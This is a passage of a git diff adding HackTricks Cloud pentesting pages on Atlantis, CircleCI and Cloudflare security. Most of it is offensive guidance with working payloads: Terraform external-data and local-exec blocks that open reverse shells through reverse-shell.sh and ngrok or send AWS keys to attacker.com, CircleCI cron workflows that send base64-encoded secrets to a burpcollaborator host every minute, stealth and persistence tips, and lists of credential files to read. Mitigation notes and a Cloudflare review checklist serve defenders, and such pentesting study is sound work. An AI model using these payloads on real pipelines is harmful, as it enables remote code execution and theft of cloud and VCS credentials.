From an attackers perspective it would be interesting to know **if you can send it messages**. +{% endhint %} + +#### Provider Credentials + +[From the docs:](https://www.runatlantis.io/docs/provider-credentials.html) + +Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider. + +It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis: + +* The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs. +* If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex: + * [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role") + * [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference) +* Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running. +* Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running. +* Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials. + +{% hint style="warning" %} +The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform. +{% endhint %} + +#### Web Page + +By default Atlantis will run a **web page in the port 4141 in localhost**. 
This page just allows you to enable/disable atlantis apply and check the plan status of the repos and unlock them (it doesn't allow to modify things, so it isn't that useful). + +You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if they are `atlantis`:`atlantis` are the **default** ones). + +### Server Configuration + +Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three. + +* You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server +* You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables) + +Values are **chosen in this order**: + +1. Flags +2. Environment Variables +3. Config File + +{% hint style="warning" %} +Note that in the configuration you might find interesting values such as **tokens and passwords**. +{% endhint %} + +#### Repos Configuration + +Some configurations affects **how the repos are managed**. However, it's possible that **each repo require different settings**, so there are ways to specify each repo. This is the priority order: + +1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) file. This file can be used to specify how atlantis should treat the repo. However, by default some keys cannot be specified here without some flags allowing it. + 1. Probably required to be allowed by flags like `allowed_overrides` or `allow_custom_workflows` +2. [**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): You can pass it with the flag `--repo-config` and it's a yaml configuring new settings for each repo (regexes supported) +3. 
**Default** values + +**PR Protections** + +Atlantis allows to indicate if you want the **PR** to be **`approved`** by somebody else (even if that isn't set in the branch protection) and/or be **`mergeable`** (branch protections passed) **before running apply**. From a security point of view, to set both options a recommended. + +In case `allowed_overrides` is True, these setting can be **overwritten on each project by the `/atlantis.yml` file**. + +**Scripts** + +The repo config can **specify scripts** to run [**before**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) (_pre workflow hooks_) and [**after**](https://www.runatlantis.io/docs/post-workflow-hooks.html) (_post workflow hooks_) a **workflow is executed.** + +There isn't any option to allow **specifying** these scripts in the **repo `/atlantis.yml`** file. + +**Workflow** + +In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\ +Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.** + +{% hint style="danger" %} +If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.\ +This will basically give **RCE in the Atlantis server to any user that can access that repo**. + +```yaml +# atlantis.yaml +version: 3 +projects: +- dir: . 
+ workflow: custom1 +workflows: + custom1: + plan: + steps: + - init + - run: my custom plan command + apply: + steps: + - run: my custom apply command +``` +{% endhint %} + +**Conftest Policy Checking** + +Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev/) **policies** against the plan output. Common usecases for using this step include: + +* Denying usage of a list of modules +* Asserting attributes of a resource at creation time +* Catching unintentional resource deletions +* Preventing security risks (ie. exposing secure ports to the public) + +You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works). + +### Atlantis Commands + +[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis: + +```bash +# Get help +atlantis help + +# Run terraform plan +atlantis plan [options] -- [terraform plan flags] +##Options: +## -d directory +## -p project +## --verbose +## You can also add extra terraform options + +# Run terraform apply +atlantis apply [options] -- [terraform apply flags] +##Options: +## -d directory +## -p project +## -w workspace +## --auto-merge-disabled +## --verbose +## You can also add extra terraform options +``` + +### Attacks + +{% hint style="warning" %} +If during the exploitation you find this **error**: `Error: Error acquiring the state lock` + +You can fix it by running: + +``` +atlantis unlock #You might need to run this in a different PR +atlantis plan -- -lock=false +``` +{% endhint %} + +#### Atlantis plan RCE - Config modification in new PR + +If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis plan`** (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**. 
+ +You can do this by making [**Atlantis load an external data source**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source). Just put a payload like the following in the `main.tf` file: + +```json +data "external" "example" { + program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"] +} +``` + +**Stealthier Attack** + +You can perform this attack even in a **stealthier way**, by following this suggestions: + +* Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell: + +```javascript +module "not_rev_shell" { + source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules" +} +``` + +You can find the rev shell code in [https://github.com/carlospolop/terraform\_external\_module\_rev\_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) + +* In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` +* **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**. + +#### Atlantis plan Secrets Dump + +You can **dump secrets used by terraform** running `atlantis plan` (`terraform plan`) by putting something like this in the terraform file: + +```json +output "dotoken" { + value = nonsensitive(var.do_token) +} +``` + +#### Atlantis apply RCE - Config modification in new PR + +If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**. 
+ +However, you will usually need to bypass some protections: + +* **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection need to be bypassed). + * Check potential [**branch protections bypasses**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) +* **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply` + * By default you can abuse the [**Gitbot token to bypass this protection**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) + +Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\ +You just need to make sure some payload like the following ones ends in the `main.tf` file: + +```json +// Payload 1 to just steal a secret +resource "null_resource" "secret_stealer" { + provisioner "local-exec" { + command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY" + } +} + +// Payload 2 to get a rev shell +resource "null_resource" "rev_shell" { + provisioner "local-exec" { + command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'" + } +} +``` + +Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way**. + +#### Terraform Param Injection + +When running `atlantis plan` or `atlantis apply` terraform is being run under-needs, you can pass commands to terraform from atlantis commenting something like: + +```bash +atlantis plan -- +atlantis plan -- -h #Get terraform plan help + +atlantis apply -- +atlantis apply -- -h #Get terraform apply help +``` + +Something you can pass are env variables which might be helpful to bypass some protections. 
Check terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables) + +#### Custom Workflow + +Running **malicious custom build commands** specified in an `atlantis.yaml` file. Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** of `master`.\ +This possibility was mentioned in a previous section: + +{% hint style="danger" %} +If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used. + +This will basically give **RCE in the Atlantis server to any user that can access that repo**. + +```yaml +# atlantis.yaml +version: 3 +projects: +- dir: . + workflow: custom1 +workflows: + custom1: + plan: + steps: + - init + - run: my custom plan command + apply: + steps: + - run: my custom apply command +``` +{% endhint %} + +#### Bypass plan/apply protections + +If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allowed_overrides` _has_ `apply_requirements` configured, it's possible for a repo to **modify the plan/apply protections to bypass them**. + +```yaml +repos: +- id: /.*/ + apply_requirements: [] +``` + +#### PR Hijacking + +If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to. + +Moreover, if you don't have configured in the **branch protection** to ask to **reevaluate** every PR when a **new commit is pushed** to it, someone could **write malicious configs** (check previous scenarios) in the terraform config, run `atlantis plan/apply` and gain RCE. 
+ +This is the **setting** in Github branch protections: + +![](<../.gitbook/assets/image (216).png>) + +#### Webhook Secret + +If you manage to **steal the webhook secret** used or if there **isn't any webhook secret** being used, you could **call the Atlantis webhook** and **invoke atlatis commands** directly. + +#### Bitbucket + +Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs. + +* This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket. +* If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos. +* To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses). + +### Post-Exploitation + +If you managed to get access to the server or at least you got a LFI there are some interesting things you should try to read: + +* `/home/atlantis/.git-credentials` Contains vcs access credentials +* `/atlantis-data/atlantis.db` Contains vcs access credentials with more info +* `/atlantis-data/repos/`_`/`_`////.terraform/terraform.tfstate` Terraform stated file + * Example: /atlantis-data/repos/ghOrg\_/\_myRepo/20/default/env/prod/.terraform/terraform.tfstate +* `/proc/1/environ` Env variables +* `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data) + +### Mitigations + +#### Don't Use On Public Repos + +Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings. 
+ +#### Don't Use `--allow-fork-prs` + +If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo. + +#### `--repo-allowlist` + +Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example: + +* Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests` +* Your whole organization: `--repo-allowlist=github.com/runatlantis/*` +* Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*` +* All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret. + +This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details. + +#### Protect Terraform Planning + +If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) or by specifying a malicious provider. This code could then exfiltrate your credentials. + +To prevent this, you could: + +1. Bake providers into the Atlantis image or host and deny egress in production. +2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry. +3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. 
requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here. + +#### Webhook Secrets + +Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab). + +If you are using Azure DevOps, instead of webhook secrets add a basic username and password. + +#### Azure DevOps Basic Authentication + +Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location. + +#### SSL/HTTPS + +If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags. + +#### Enable Authentication on Atlantis Web Server + +It is very recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` and setup a username and a password using `--web-username=yourUsername` and `--web-password=yourPassword` flags. + +You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`. + +### References + +* [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs) +* [**https://www.runatlantis.io/docs/provider-credentials.html**](https://www.runatlantis.io/docs/provider-credentials.html) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/circleci-security.md b/pentesting-ci-cd/circleci-security.md new file mode 100644 index 0000000000..e92fede51f --- /dev/null +++ b/pentesting-ci-cd/circleci-security.md @@ -0,0 +1,286 @@ +# CircleCI Security + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### Basic Information + +[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you can **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example. + +### Permissions + +**CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\ +In my testing I checked that as long as you have **write permissions over the repo in github**, you are going to be able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...). + +However, you need to be a a **repo admin** in order to **convert the repo into a CircleCI project**. + +### Env Variables & Secrets + +According to [**the docs**](https://circleci.com/docs/2.0/env-vars/) there are different ways to **load values in environment variables** inside a workflow. + +#### Built-in env variables + +Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`. 
+ +#### Clear text + +You can declare them in clear text inside a **command**: + +```yaml +- run: + name: "set and echo" + command: | + SECRET="A secret" + echo $SECRET +``` + +You can declare them in clear text inside the **run environment**: + +```yaml +- run: + name: "set and echo" + command: echo $SECRET + environment: + SECRET: A secret +``` + +You can declare them in clear text inside the **build-job environment**: + +```yaml +jobs: + build-job: + docker: + - image: cimg/base:2020.01 + environment: + SECRET: A secret +``` + +You can declare them in clear text inside the **environment of a container**: + +```yaml +jobs: + build-job: + docker: + - image: cimg/base:2020.01 + environment: + SECRET: A secret +``` + +#### Project Secrets + +These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\ +You can see them **declared in** _https://app.circleci.com/settings/project/github/\/\/environment-variables_ + +![](<../.gitbook/assets/image (129).png>) + +{% hint style="danger" %} +The "**Import Variables**" functionality allows to **import variables from other projects** to this one. +{% endhint %} + +#### Context Secrets + +These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here: + +![](<../.gitbook/assets/image (123).png>) + +{% hint style="success" %} +However, note that a different group (instead of All members) can be **selected to only give access to the secrets to specific people**.\ +This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people. +{% endhint %} + +### Attacks + +#### Search Clear Text Secrets + +If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there. 
+ +#### Secret Env Vars & Context enumeration + +Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\/contexts_. + +#### Exfiltrate Project secrets + +{% hint style="warning" %} +In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_). +{% endhint %} + +{% hint style="danger" %} +The "**Import Variables**" functionality allows to **import variables from other projects** to this one. Therefore, an attacker could **import all the project variables from all the repos** and then **exfiltrate all of them together**. +{% endhint %} + +All the project secrets always are set in the env of the jobs, so just calling env and obfuscating it in base64 will exfiltrate the secrets in the **workflows web log console**: + +```yaml +version: 2.1 + +jobs: + exfil-env: + docker: + - image: cimg/base:stable + steps: + - checkout + - run: + name: "Exfil env" + command: "env | base64" + +workflows: + exfil-env-workflow: + jobs: + - exfil-env +``` + +If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **create a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**: + +```yaml +version: 2.1 + +jobs: + exfil-env: + docker: + - image: cimg/base:stable + steps: + - checkout + - run: + name: "Exfil env" + command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" + +# I filter by the repo branch where this config.yaml file is located: circleci-project-setup +workflows: + exfil-env-workflow: + triggers: + - schedule: + cron: 
"* * * * *" + filters: + branches: + only: + - circleci-project-setup + jobs: + - exfil-env +``` + +#### Exfiltrate Context Secrets + +You need to **specify the context name** (this will also exfiltrate the project secrets): + +```yaml +version: 2.1 + +jobs: + exfil-env: + docker: + - image: cimg/base:stable + steps: + - checkout + - run: + name: "Exfil env" + command: "env | base64" + +workflows: + exfil-env-workflow: + jobs: + - exfil-env: + context: Test-Context +``` + +If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **modify a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**: + +```yaml +version: 2.1 + +jobs: + exfil-env: + docker: + - image: cimg/base:stable + steps: + - checkout + - run: + name: "Exfil env" + command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" + +# I filter by the repo branch where this config.yaml file is located: circleci-project-setup +workflows: + exfil-env-workflow: + triggers: + - schedule: + cron: "* * * * *" + filters: + branches: + only: + - circleci-project-setup + jobs: + - exfil-env: + context: Test-Context +``` + +{% hint style="warning" %} +Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**. +{% endhint %} + +#### Escape to Cloud + +**CircleCI** gives you the option to run **your builds in their machines or in your own**.\ +By default their machines are located in GCP, and you initially won't be able to fid anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**. 
+ +Notice that in the previous examples it was launched everything inside a docker container, but you can also **ask to launch a VM machine** (which may have different cloud permissions): + +```yaml +jobs: + exfil-env: + #docker: + # - image: cimg/base:stable + machine: + image: ubuntu-2004:current +``` + +Or even a docker container with access to a remote docker service: + +```yaml +jobs: + exfil-env: + docker: + - image: cimg/base:stable + steps: + - checkout + - setup_remote_docker: + version: 19.03.13 +``` + +#### Persistence + +* It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access. + * _https://app.circleci.com/settings/user/tokens_ +* It's possible to **create projects tokens** to access the project with the permissions given to the token. + * _https://app.circleci.com/settings/project/github/\/\/api_ +* It's possible to **add SSH keys** to the projects. + * _https://app.circleci.com/settings/project/github/\/\/ssh_ +* It's possible to **create a cron job in hidden branch** in an unexpected project that is **leaking** all the **context env** vars everyday. + * Or even create in a branch / modify a known job that will **leak** all context and **projects secrets** everyday. +* If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor** +* You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/cloudflare-security/README.md b/pentesting-ci-cd/cloudflare-security/README.md new file mode 100644 index 0000000000..05741968d4 --- /dev/null +++ b/pentesting-ci-cd/cloudflare-security/README.md @@ -0,0 +1,163 @@ +# Cloudflare Security + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +In a Cloudflare account there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** + +
+ +## Websites + +Review each with: + +{% content-ref url="cloudflare-domains.md" %} +[cloudflare-domains.md](cloudflare-domains.md) +{% endcontent-ref %} + +### Domain Registration + +* [ ] In **`Transfer Domains`** check that it's not possible to transfer any domain. + +Review each with: + +{% content-ref url="cloudflare-domains.md" %} +[cloudflare-domains.md](cloudflare-domains.md) +{% endcontent-ref %} + +## Analytics + +_I couldn't find anything to check for a config security review._ + +## Pages + +On each Cloudflare's page: + +* [ ] Check for **sensitive information** in the **`Build log`**. +* [ ] Check for **sensitive information** in the **Github repository** assigned to the pages. +* [ ] Check for potential github repo compromise via **workflow command injection** or `pull_request_target` compromise. More info in the [**Github Security page**](../github-security/). +* [ ] Check for **vulnerable functions** in the `/fuctions` directory (if any), check the **redirects** in the `_redirects` file (if any) and **misconfigured headers** in the `_headers` file (if any). +* [ ] Check for **vulnerabilities** in the **web page** via **blackbox** or **whitebox** if you can **access the code** +* [ ] In the details of each page `//pages/view/blocklist/settings/functions`. Check for **sensitive information** in the **`Environment variables`**. +* [ ] In the details page check also the **build command** and **root directory** for **potential injections** to compromise the page. + +## **Workers** + +On each Cloudflare's worker check: + +* [ ] The triggers: What makes the worker trigger? Can a **user send data** that will be **used** by the worker? 
+* [ ] In the **`Settings`**, check for **`Variables`** containing **sensitive information** +* [ ] Check the **code of the worker** and search for **vulnerabilities** (specially in places where the user can manage the input) + * Check for SSRFs returning the indicated page that you can control + * Check XSSs executing JS inside a svg image + * It is possible that the worker interacts with other internal services. For example, a worker may interact with a R2 bucket storing information in it obtained from the input. In that case, it would be necessary to check what capabilities does the worker have over the R2 bucket and how could it be abused from the user input. + +{% hint style="warning" %} +Note that by default a **Worker is given a URL** such as `..workers.dev`. The user can set it to a **subdomain** but you can always access it with that **original URL** if you know it. +{% endhint %} + +## R2 + +On each R2 bucket check: + +* [ ] Configure **CORS Policy**. + +## Stream + +TODO + +## Images + +TODO + +## Security Center + +* [ ] If possible, run a **`Security Insights`** **scan** and an **`Infrastructure`** **scan**, as they will **highlight** interesting information **security** wise. + * [ ] Just **check this information** for security misconfigurations and interesting info + +## Turnstile + +TODO + +## **Zero Trust** + +{% content-ref url="cloudflare-zero-trust-network.md" %} +[cloudflare-zero-trust-network.md](cloudflare-zero-trust-network.md) +{% endcontent-ref %} + +## Bulk Redirects + +{% hint style="info" %} +Unlike [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) are essentially static — they do **not support any string replacement** operations or regular expressions. However, you can configure URL redirect parameters that affect their URL matching behavior and their runtime behavior. 
+{% endhint %} + +* [ ] Check that the **expressions** and **requirements** for redirects **make sense**. +* [ ] Check also for **sensitive hidden endpoints** that you contain interesting info. + +## Notifications + +* [ ] Check the **notifications.** These notifications are recommended for security: + * `Usage Based Billing` + * `HTTP DDoS Attack Alert` + * `Layer 3/4 DDoS Attack Alert` + * `Advanced HTTP DDoS Attack Alert` + * `Advanced Layer 3/4 DDoS Attack Alert` + * `Flow-based Monitoring: Volumetric Attack` + * `Route Leak Detection Alert` + * `Access mTLS Certificate Expiration Alert` + * `SSL for SaaS Custom Hostnames Alert` + * `Universal SSL Alert` + * `Script Monitor New Code Change Detection Alert` + * `Script Monitor New Domain Alert` + * `Script Monitor New Malicious Domain Alert` + * `Script Monitor New Malicious Script Alert` + * `Script Monitor New Malicious URL Alert` + * `Script Monitor New Scripts Alert` + * `Script Monitor New Script Exceeds Max URL Length Alert` + * `Advanced Security Events Alert` + * `Security Events Alert` +* [ ] Check all the **destinations**, as there could be **sensitive info** (basic http auth) in webhook urls. Make also sure webhook urls use **HTTPS** + * [ ] As extra check, you could try to **impersonate a cloudflare notification** to a third party, maybe you can somehow **inject something dangerous** + +## Manage Account + +* [ ] It's possible to see the **last 4 digits of the credit card**, **expiration** time and **billing address** in **`Billing` -> `Payment info`**. +* [ ] It's possible to see the **plan type** used in the account in **`Billing` -> `Subscriptions`**. +* [ ] In **`Members`** it's possible to see all the members of the account and their **role**. Note that if the plan type isn't Enterprise, only 2 roles exist: Administrator and Super Administrator. 
But if the used **plan is Enterprise**, [**more roles**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) can be used to follow the least privilege principle. + * Therefore, whenever possible is **recommended** to use the **Enterprise plan**. +* [ ] In Members it's possible to check which **members** has **2FA enabled**. **Every** user should have it enabled. + +{% hint style="info" %} +Note that fortunately the role **`Administrator`** doesn't give permissions to manage memberships (**cannot escalate privs or invite** new members) +{% endhint %} + +## DDoS Investigation + +[Check this part](cloudflare-domains.md#cloudflare-ddos-protection). + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
